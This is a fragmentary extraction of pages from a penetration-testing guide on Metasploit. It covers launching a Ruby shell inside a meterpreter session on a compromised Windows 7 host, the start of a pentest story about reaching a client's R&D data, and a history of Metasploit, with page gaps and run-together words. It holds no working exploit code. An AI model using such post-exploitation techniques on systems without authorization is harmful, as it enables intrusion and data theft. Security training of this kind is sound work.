Meterpreter is considered the heart of metasploit - it provides a wide range of features that can be performed during post ex-ploitation. The main role of meterpreter is to make our penetration task easier and faster. In this tutorial we will talk about someof the advanced concepts related to meterpreter. We will dive deeper into the core of metasploit to understand how meterpreterscripts function and how we can build our own scripts.

From a penetration tester’s point of view, it is very essential to know how to implement their own scripting techniques, to fulfillthe needs of their scenario. There can be situations when you have to perform tasks where meterpreter may not be enough tosolve your requirements. So you cannot sit back. This is where developing own scripts and modules becomes handy. In thistutorial, we will discuss the meterpreter API and some important mixins. Then in later recipes, we will code our own meterpreterscripts.

Meterpreter API

Meterpreter API can be helpful for programmers to implement their own scripts during penetration testing. Since the entireMetasploit framework is built using the Ruby language, some experience in Ruby programming can enhance your penetrationexperience with metasploit. We will be dealing with Ruby scripts in the next few recipes, so some Ruby programming experiencewill be required to understand the scripts. Even if you have a basic understanding of Ruby, or other scripting languages, it willbe easy for you to understand the concepts.

Let us start with launching an interactive Ruby shell in the meterpreter. Here I am assuming that we have already exploited thetarget (Windows 7) and have an active meterpreter session.

The Ruby shell can be launched by using the irb command.

meterpreter > irb[*] Starting IRB shell[*] The ’client’ variable holds the meterpreter client

Now, we are into the Ruby shell and can execute our Ruby scripts. Let us start with a basic addition of two numbers.

>> 2+2=> 4

This demonstrates that our shell is working fine and can interpret the statements. Let us perform a complex operation now. Letus create a hash and store some values in it along with keys. Then we will delete the values conditionally. The script will looksomething like this:

x = { "a" => 100, "b" => 20 }x.delete_if { |key, value| value < 25 }print x.inspect


58 / 78


59 / 78

Chapter 6

The Inside-Outsider - Leveraging Web Applica-tion Vulnerabilities + Metasploit to become theUltimate Insider

”Strategy without tactics is the slowest route to victory. Tactics without strategy is the noise before defeat”– Sun Tzu

’Greed is good’ – Gordon Gekko, ’Wall Street’

Introduction

An effective penetration test is one that has a specific objective. Typically, the objective is to identify and exploit as manyvulnerabilities as can be found, within the scope of the rules of engagement. However, my interpretation of ‘objective’ is a littledifferent. For me, being objective is really about whether I, as a penetration tester, can gain access to information assets that theorganization considers critical. This means that whilst I might uncover several vulnerabilities during the course of a penetrationtest, but if am unable to gain access to critical information assets of the organization, the fundamental objective is still not met.

I had been working with a client in the manufacturing sector recently. This company has a sizable IT deployment with multiplelocations, a private MPLS "cloud" network connecting all their sites. SAP deployments spanning across their locations, aswell as a multitude of commercial and custom web applications that were being utilized for everything from Human ResourceManagement to Supplier and Customer Relationship Management.

The most critical information asset for this company was its R&D Design Information. This company would spend monthsdesigning components that it would manufacture and subsequently sell to its customers. The company is in a highly competitivemarket, where it is the leader. Therefore, even the theft / unauthorized disclosure of a single design would result in millionsof dollars lost for the company in terms of business opportunities and client confidence. The company had also been assessedand tested for security vulnerabilities over the last 3 odd years, but there were incidents that had occurred and the managementwanted another test to be performed.

Our objective was simple. The CEO conveyed that if we were able to gain access to R&D Design Information, then the Penetra-tion Test would be a successful one. We could use any method of incursion, internally or externally, with the exception of socialengineering and Denial-Of-Service to achieve our goals.

This article is essentially the story of that penetration test and the things that my team and I discovered about Metasploit and howto become the Ultimate Insider in an organization. Lets begin. . . .

The First Incursion – The Web App

Its no surprise that companies deploy web apps ‘by the boatloads’ today. Web Apps have been ubiquitous in the enterprise.Apps fuel HR departments, purchase departments, corporate communcation, intranets, extranets and so on. These applications


68 / 78

Chapter 7

Metasploit for penetration testing

When we say "Penetration Testing tool" the first thing that comes to our mind is the world’s largest Ruby project, initiallystarted by HD Moore in 2003 called ’Metasploit ’ a sub-project of Metasploit Project. Other important sub-projects includethe Opcode Database, shell code archive, and security research. It was created in 2003 in the Perl programming language,but due to some Perl disadvantages was completely re-written in the Ruby Programming Language in 2005. On October 21,2009, Rapid7, a vulnerability management solution company, acquired the Metasploit Project. A collaboration between theopen source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verifyvulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilitiesinclude smart exploitation, password auditing, web application scanning, and social engineering.

No wonder it had become the standard framework for penetration testing and vulnerability development and the world’s largestpublic database of quality assured exploits.

Metasploit itself is free, opensource software, with many contributors in the security community, but two commercial Metasploitversions are also available.

Working with metasploit

Metasploit is simple to work on and is designed with ease-of-use in mind to support Penetration Testers and other securityexperts. When you encounter the Metasploit Framework (MSF) for the first time, you might be overwhelmed by its manyinterfaces, options, utilities, variables, and modules.

Metasploit framework had basic terminology that is same throughout the security industry. These terms are as follows:

Metasploit Framework, Guide for Pentesters.

Education

Transcript of Metasploit Framework, Guide for Pentesters.